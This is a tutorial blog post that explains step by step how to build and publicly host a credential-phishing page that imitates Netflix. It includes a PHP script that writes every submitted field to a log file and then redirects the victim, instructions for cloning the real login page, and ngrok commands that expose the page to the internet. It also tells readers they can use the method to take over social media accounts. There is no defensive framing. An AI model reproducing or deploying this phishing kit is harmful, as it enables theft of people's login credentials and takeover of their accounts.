How to Create and Host a Phishing Page

 Hey Folks, finally the day has come where we will teach you how to create a phishing page of any social media like Facebook, Twitter, Netflix, Instagram etc. Usually people take help of many types of tools that automatically create a phishing page and give us the link, that’s it. But you do not get information about how a phishing page is made and how we can make our phishing page and host for publicly ? So we have come here with a wonderful tutorial and we are sure that you will get complete information related to this topic.

Let’s take a look  !!

Installation of Apache Server

Apache servers are typically used to host our documents locally after which anyone within the network can view and download the document. So we will install this apache web server to host our phishing page locally. The root folder of apache web server is given below where you can host your documents.

1 2	apt install apache2 cd /var/www/html/

After accessing the root folder of the apache server we will create a php file named “post.php” in which you need to copy and paste the entire given code. Keep in mind header will change according to the phishing page. The following code will open the log.txt file and write all the values entered by the victim.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

nano post.php   <?php header ('Location: https://www.netflix.com'); $handle = fopen("log.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n\n\n\n"); fclose($handle); exit; ?>

We need to create one more file called “log.txt“. After that we will give executable permissions to both these files which we ourselves have created in apache root folder.

1 2 3

touch log.txt chmod +x log.txt post.php chmod 7777 *

Done  !! Back end worked have been completed ! Now we need to go to the Netflix web page.

Now we will save the entire web page by pressing CTRL + S button. Keep in mind that you have to save the web page named “index.html” as well as the location of the apache web server.

Done  !! As you can see the file is saved on the apache web server.

Now finally we have to open the saved “index.html” file and set “post.php” in action.

Ready  !! As you can see, the phishing page looks like a real Netflix page. Now we will enter the credentials to check if it is working or not.

Boom  !! After opening the “log.txt” file we get the credentials entered in our phishing page which means that it works fine. HUREEEEEEE  !!
cat log.txt

Likewise, you can create any social media phishing page and takeover the accounts.

Public Your Phishing Page

To access our phishing page publicly, we need to take help of ngrok service that you can download from here. After download it just unzip the folder.

1	https://ngrok.com/download

After unzip the file you will get an bash scripted “ngrok” service. Now we will start that service by using the following command.

1 2	unzip ngrok-stable-linux-amd64.zip ./ngrok http 80

As you can see we get two links from which we can choose one. Keep in mind to do not press “CTRL + C “.

WOW  !! As you can see our phishing page has successfully become public and accessible to all.